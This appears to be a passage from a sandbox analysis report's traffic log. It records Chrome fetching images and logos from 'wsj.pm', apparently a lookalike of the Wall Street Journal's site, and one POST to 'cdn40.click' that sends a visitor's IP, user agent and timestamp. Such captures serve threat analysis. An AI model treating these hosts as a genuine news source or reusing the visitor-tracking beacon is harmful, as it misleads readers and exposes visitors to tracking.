                                                                                                                2024-04-25 14:58:20 UTC1645INData Raw: dc 47 1a 5e 09 7d 57 b8 ad 1c 4c b6 2c 5a 6f 56 26 ab 68 6c 3a 96 54 75 c6 03 b0 01 87 cc 1e f5 03 52 fa 33 b3 d5 90 dc 68 3a 84 6c 00 c8 50 77 01 f9 55 ce db a4 ad 7a 83 43 7f 0e 34 17 21 73 90 33 fb 1a cb 1e d3 53 d2 75 59 ac 56 57 86 64 3f 84 9e 7d 31 5c d9 15 3a 3a b1 3d 95 81 f5 3d 16 e7 a6 9e 68 b5 1b 68 e5 f1 06 d4 90 1f ba 68 75 a4 2d 7b 38 86 57 fb 88 48 3e 95 74 eb b9 5c 74 ed 9c 17 05 a6 bd c0 de 5f bf ce a8 56 0c f6 eb 72 c5 48 60 98 fd 6a 39 68 d7 a7 42 22 3b 27 2a 4e 41 e2 ae 9f 46 f7 c2 1b d9 f4 e9 db 10 cb c6 0f a1 aa 3c 20 98 b3 8f 7c d1 2b 0b 83 6b a9 d9 dc a9 c0 24 02 69 ae 19 2f 94 4a ea db 71 a5 eb 97 10 00 7c 32 77 03 43 59 16 68 f7 70 07 b5 59 7e 91 d4 4d 35 b5 d8 ed 22 8c 9f ca aa da 70 66 57 01 43 63 d6 86 a8 13 b2 35 ec 29 04 e5
                                                                                                                Data Ascii: G^}WL,ZoV&hl:TuR3h:lPwUzC4!s3SuYVWd?}1\::==hhhu-{8WH>t\t_VrH`j9hB";'*NAF< |+k$i/Jq|2wCYhpY~M5"pfWCc5)


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                35192.168.2.1749755103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC577OUTGET /img/im-44291453.avif HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC250INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:51 GMT
                                                                                                                ETag: "4ba-61649015475c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 1210
                                                                                                                Connection: close
                                                                                                                Content-Type: image/avif
                                                                                                                2024-04-25 14:58:20 UTC1210INData Raw: 00 00 00 20 66 74 79 70 61 76 69 66 00 00 00 00 61 76 69 66 6d 69 66 31 6d 69 61 66 4d 41 31 41 00 00 00 f2 6d 65 74 61 00 00 00 00 00 00 00 28 68 64 6c 72 00 00 00 00 00 00 00 00 70 69 63 74 00 00 00 00 00 00 00 00 00 00 00 00 6c 69 62 61 76 69 66 00 00 00 00 0e 70 69 74 6d 00 00 00 00 00 01 00 00 00 1e 69 6c 6f 63 00 00 00 00 44 00 00 01 00 01 00 00 00 01 00 00 01 1a 00 00 03 a0 00 00 00 28 69 69 6e 66 00 00 00 00 00 01 00 00 00 1a 69 6e 66 65 02 00 00 00 00 01 00 00 61 76 30 31 43 6f 6c 6f 72 00 00 00 00 6a 69 70 72 70 00 00 00 4b 69 70 63 6f 00 00 00 14 69 73 70 65 00 00 00 00 00 00 00 3c 00 00 00 3c 00 00 00 10 70 69 78 69 00 00 00 00 03 08 08 08 00 00 00 0c 61 76 31 43 81 20 00 00 00 00 00 13 63 6f 6c 72 6e 63 6c 78 00 02 00 02 00 01 80 00 00 00 17
                                                                                                                Data Ascii: ftypavifavifmif1miafMA1Ameta(hdlrpictlibavifpitmilocD(iinfinfeav01ColorjiprpKipcoispe<<pixiav1C colrnclx


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                36192.168.2.1749756103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC371OUTGET /img/CH-AA158_Bernst_NS_20100111195708.gif HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC250INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:37 GMT
                                                                                                                ETag: "1c6a-61648fceb4f40"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 7274
                                                                                                                Connection: close
                                                                                                                Content-Type: image/gif
                                                                                                                2024-04-25 14:58:20 UTC7274INData Raw: 47 49 46 38 39 61 4c 00 4c 00 f7 00 00 fe fe fe fd fd fd fc fc fc f6 f6 f6 f9 f9 f9 fa fa fa fb fb fb ee ee ee f7 f7 f7 6c 6c 6c f2 f2 f2 73 73 73 56 56 56 f8 f8 f8 f1 f1 f1 71 71 71 58 58 58 5c 5c 5c 59 59 59 f5 f5 f5 ef ef ef f4 f4 f4 f0 f0 f0 e6 e6 e6 eb eb eb f3 f3 f3 ec ec ec 76 76 76 66 66 66 65 65 65 74 74 74 ed ed ed 88 88 88 79 79 79 49 49 49 ea ea ea 80 80 80 8b 8b 8b 9a 9a 9a 92 92 92 6b 6b 6b 63 63 63 54 54 54 89 89 89 81 81 81 68 68 68 51 51 51 55 55 55 dc dc dc 70 70 70 e7 e7 e7 67 67 67 6f 6f 6f 5d 5d 5d 61 61 61 46 46 46 53 53 53 e1 e1 e1 72 72 72 87 87 87 57 57 57 48 48 48 4a 4a 4a 4f 4f 4f 77 77 77 78 78 78 7d 7d 7d 64 64 64 7f 7f 7f e5 e5 e5 de de de 8a 8a 8a 82 82 82 e9 e9 e9 7a 7a 7a 5f 5f 5f 40 40 40 df df df d2 d2 d2 83 83 83 50 50
                                                                                                                Data Ascii: GIF89aLLlllsssVVVqqqXXX\\\YYYvvvfffeeetttyyyIIIkkkcccTTThhhQQQUUUpppgggooo]]]aaaFFFSSSrrrWWWHHHJJJOOOwwwxxx}}}dddzzz___@@@PP


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                37192.168.2.174975823.133.88.1904436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC648OUTPOST /9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95 HTTP/1.1
                                                                                                                Host: cdn40.click
                                                                                                                Connection: keep-alive
                                                                                                                Content-Length: 252
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Content-Type: application/json
                                                                                                                Accept: */*
                                                                                                                Origin: https://wsj.pm
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC252OUTData Raw: 7b 22 66 22 3a 22 64 39 39 38 34 34 65 31 2d 34 35 39 39 2d 34 31 30 65 2d 61 61 30 64 2d 62 35 30 34 63 35 63 61 33 64 64 66 22 2c 22 6d 22 3a 22 32 35 22 2c 22 70 61 67 65 22 3a 22 2f 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 30 34 2d 32 35 54 31 34 3a 35 38 3a 31 38 2e 32 36 32 5a 22 2c 22 69 70 22 3a 22 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 22 2c 22 75 73 65 72 5f 61 67 65 6e 74 22 3a 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 31 31 37 2e 30 2e 30 2e 30 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 22 7d
                                                                                                                Data Ascii: {"f":"d99844e1-4599-410e-aa0d-b504c5ca3ddf","m":"25","page":"/","timestamp":"2024-04-25T14:58:18.262Z","ip":"185.152.66.230","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"}
                                                                                                                2024-04-25 14:58:21 UTC284INHTTP/1.1 201 Created
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 0
                                                                                                                Connection: close
                                                                                                                X-Powered-By: Express
                                                                                                                access-control-allow-origin: https://wsj.pm
                                                                                                                vary: Origin
                                                                                                                ETag: W/"0-2jmj7l5rSw0yVb/vlWAYkK/YBwk"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                38192.168.2.1749757103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC575OUTGET /img/im-647221.avif HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC251INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:18:01 GMT
                                                                                                                ETag: "1391-6164901ed0c40"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 5009
                                                                                                                Connection: close
                                                                                                                Content-Type: image/avif
                                                                                                                2024-04-25 14:58:21 UTC5009INData Raw: 00 00 00 20 66 74 79 70 61 76 69 66 00 00 00 00 61 76 69 66 6d 69 66 31 6d 69 61 66 4d 41 31 42 00 00 10 f7 6d 65 74 61 00 00 00 00 00 00 00 28 68 64 6c 72 00 00 00 00 00 00 00 00 70 69 63 74 00 00 00 00 00 00 00 00 00 00 00 00 6c 69 62 61 76 69 66 00 00 00 00 0e 70 69 74 6d 00 00 00 00 00 01 00 00 00 1e 69 6c 6f 63 00 00 00 00 44 00 00 01 00 01 00 00 00 01 00 00 11 1f 00 00 02 72 00 00 00 28 69 69 6e 66 00 00 00 00 00 01 00 00 00 1a 69 6e 66 65 02 00 00 00 00 01 00 00 61 76 30 31 43 6f 6c 6f 72 00 00 00 10 6f 69 70 72 70 00 00 10 4f 69 70 63 6f 00 00 00 14 69 73 70 65 00 00 00 00 00 00 00 3c 00 00 00 3c 00 00 00 10 70 69 78 69 00 00 00 00 03 08 08 08 00 00 00 0c 61 76 31 43 81 00 0c 00 00 00 10 04 63 6f 6c 72 70 72 6f 66 00 00 0f f8 61 70 70 6c 02 10 00
                                                                                                                Data Ascii: ftypavifavifmif1miafMA1Bmeta(hdlrpictlibavifpitmilocDr(iinfinfeav01ColoroiprpOipcoispe<<pixiav1Ccolrprofappl


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                39192.168.2.1749759103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC606OUTGET /img/wsj-logo-big-black.e653dfca.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/css/footer.css
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC255INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:27:50 GMT
                                                                                                                ETag: "442b-6164925087980"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 17451
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml
                                                                                                                2024-04-25 14:58:21 UTC7937INData Raw: 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 33 22 20 68 65 69 67 68 74 3d 22 34 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 33 20 34 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 36 2e 37 31 39 37 35 20 31 39 2e 34 36 38 34 43 36 2e 37 31 39 37 35 20 32 30 2e 34 32 34 38 20 36 2e 39 39 32 30 31 20 32 30 2e 36 30 39 32 20 37 2e 35 39 37 37 34 20 32 30 2e 37 36 34 32 4c 38 2e 35 33 36 30 34 20 32 30 2e 39 38 30 33 56 32 31 2e 34 31 32 34 48 32 2e 33 30 30 35 32 56 32 30 2e 39 38 30 33 4c 33 2e
                                                                                                                Data Ascii: <svg width="243" height="46" viewBox="0 0 243 46" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M6.71975 19.4684C6.71975 20.4248 6.99201 20.6092 7.59774 20.7642L8.53604 20.9803V21.4124H2.30052V20.9803L3.
                                                                                                                2024-04-25 14:58:21 UTC8000INData Raw: 36 30 38 20 32 2e 30 33 36 32 56 31 36 2e 37 35 33 33 43 31 38 37 2e 36 30 38 20 31 39 2e 37 34 35 39 20 31 38 38 2e 34 35 35 20 32 30 2e 35 31 37 35 20 31 38 39 2e 39 39 39 20 32 30 2e 35 31 37 35 43 31 39 31 2e 38 31 36 20 32 30 2e 35 31 37 35 20 31 39 32 2e 35 37 33 20 31 39 2e 34 36 38 34 20 31 39 32 2e 35 37 33 20 31 36 2e 34 34 34 36 56 34 2e 31 36 35 30 35 43 31 39 32 2e 35 37 33 20 31 2e 35 37 33 33 36 20 31 39 32 2e 35 34 32 20 30 2e 39 35 36 34 30 33 20 31 39 31 2e 34 35 33 20 30 2e 37 30 39 36 31 38 4c 31 39 30 2e 38 37 38 20 30 2e 35 38 36 32 32 36 56 30 2e 31 35 34 31 32 37 48 32 30 30 2e 38 30 36 43 32 30 33 2e 33 37 39 20 30 2e 31 35 34 31 32 37 20 32 30 35 2e 37 37 20 31 2e 38 32 30 31 35 20 32 30 35 2e 37 37 20 35 2e 33 30 36 33 32 43 32
                                                                                                                Data Ascii: 608 2.0362V16.7533C187.608 19.7459 188.455 20.5175 189.999 20.5175C191.816 20.5175 192.573 19.4684 192.573 16.4446V4.16505C192.573 1.57336 192.542 0.956403 191.453 0.709618L190.878 0.586226V0.154127H200.806C203.379 0.154127 205.77 1.82015 205.77 5.30632C2
                                                                                                                2024-04-25 14:58:21 UTC1514INData Raw: 33 36 2e 38 37 30 33 20 31 31 39 2e 37 38 34 20 33 35 2e 33 38 35 33 20 31 31 38 2e 30 31 34 20 33 35 2e 33 38 35 33 43 31 31 37 2e 30 35 34 20 33 35 2e 33 38 35 33 20 31 31 36 2e 33 36 34 20 33 35 2e 38 30 35 33 20 31 31 35 2e 38 33 39 20 33 36 2e 32 34 30 33 4c 31 31 35 2e 36 31 34 20 33 35 2e 35 33 35 33 48 31 31 34 2e 35 30 34 56 34 35 2e 39 30 30 33 48 31 31 35 2e 39 34 34 56 34 32 2e 38 32 35 33 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 32 35 2e 32 30 39 20 34 32 2e 32 35 35 33 43 31 32 34 2e 32 37 39 20 34 32 2e 32 35 35 33 20 31 32 33 2e 37 33 39 20 34 31 2e 37 37 35 33 20 31 32 33 2e 37 33 39 20 34 30 2e 39 35 30 33 43 31 32 33 2e 37 33 39 20 34 30 2e 36 30 35 33 20 31 32 33 2e 38 34 34 20 34 30 2e 32
                                                                                                                Data Ascii: 36.8703 119.784 35.3853 118.014 35.3853C117.054 35.3853 116.364 35.8053 115.839 36.2403L115.614 35.5353H114.504V45.9003H115.944V42.8253Z" fill="black"/><path d="M125.209 42.2553C124.279 42.2553 123.739 41.7753 123.739 40.9503C123.739 40.6053 123.844 40.2


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                40192.168.2.1749760103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC599OUTGET /img/google-play.4699f3c2.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/css/footer.css
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC254INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:28:06 GMT
                                                                                                                ETag: "194b-6164925fc9d80"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 6475
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml
                                                                                                                2024-04-25 14:58:21 UTC6475INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 31 35 2e 38 20 32 37 2e 33 22 3e 3c 67 20 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 64 69 73 70 6c 61 79 3d 22 69 6e 6c 69 6e 65 22 20 64 3d 22 4d 31 32 30 2c 33 33 2e 32 48 2d 35 63 2d 32 2e 38 2c 30 2d 35 2d 32 2e 32 2d 35 2d 35 76 2d 33 30 63 30 2d 32 2e 38 2c 32 2e 32 2d 35 2c 35 2d 35 68 31 32 35 63 32 2e 38 2c 30 2c 35 2c 32 2e 32 2c 35 2c 35 76 33 30 43 31 32 35 2c 33 31 2c 31 32 32 2e 38 2c 33 33 2e 32 2c 31 32 30 2c 33 33 2e 32 7a 22 2f 3e 3c 2f 67 3e 3c 67 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 46 46 46 46 46 46
                                                                                                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 115.8 27.3"><g display="none"><path display="inline" d="M120,33.2H-5c-2.8,0-5-2.2-5-5v-30c0-2.8,2.2-5,5-5h125c2.8,0,5,2.2,5,5v30C125,31,122.8,33.2,120,33.2z"/></g><g><path fill="#FFFFFF" stroke="#FFFFFF


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                41192.168.2.1749761103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC596OUTGET /img/appstore.a6e93ba3.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/css/footer.css
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC254INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:28:18 GMT
                                                                                                                ETag: "1558-6164926b3b880"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 5464
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml
                                                                                                                2024-04-25 14:58:21 UTC5464INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 39 39 2e 35 20 32 35 2e 31 22 3e 3c 67 3e 3c 67 3e 3c 67 3e 3c 67 3e 3c 67 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 64 3d 22 4d 31 34 2e 38 2c 31 31 2e 39 63 30 2d 31 2e 37 2c 30 2e 39 2d 33 2e 33 2c 32 2e 34 2d 34 2e 32 63 2d 30 2e 39 2d 31 2e 33 2d 32 2e 34 2d 32 2e 31 2d 34 2d 32 2e 32 63 2d 31 2e 37 2d 30 2e 32 2d 33 2e 33 2c 31 2d 34 2e 32 2c 31 20 63 2d 30 2e 39 2c 30 2d 32 2e 32 2d 31 2d 33 2e 36 2d 31 43 33 2e 35 2c 35 2e 37 2c 31 2e 38 2c 36 2e 37 2c 30 2e 39 2c 38 2e 33 63 2d 31 2e 39 2c 33 2e 33 2d 30 2e 35 2c 38 2e 33 2c 31 2e 34 2c 31 31 63 30 2e 39 2c 31 2e 33
                                                                                                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 99.5 25.1"><g><g><g><g><g><path fill="#FFFFFF" d="M14.8,11.9c0-1.7,0.9-3.3,2.4-4.2c-0.9-1.3-2.4-2.1-4-2.2c-1.7-0.2-3.3,1-4.2,1 c-0.9,0-2.2-1-3.6-1C3.5,5.7,1.8,6.7,0.9,8.3c-1.9,3.3-0.5,8.3,1.4,11c0.9,1.3


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                42192.168.2.1749762103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC341OUTGET /img/AM.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:52 GMT
                                                                                                                ETag: "4b4e-61648fdd03100"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 19278
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg
                                                                                                                2024-04-25 14:58:21 UTC7940INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 dc 00 dc 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 06 04 05 07 08 03 02 01 ff c4 00 3e 10 00 02 02 02 01 03 03 03 03 03 02 04 04 04 07 00 01 02 03 04 05 11 12 00 06 21 13 22 31 07 14 41 23 32 51 15 42 61 08 81 24 33 52 71 16 62 91 a1 17 43 53 b1 25 72 82 83 92 c1 e1 ff c4
                                                                                                                Data Ascii: C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((">!"1A#2QBa$3RqbCS%r
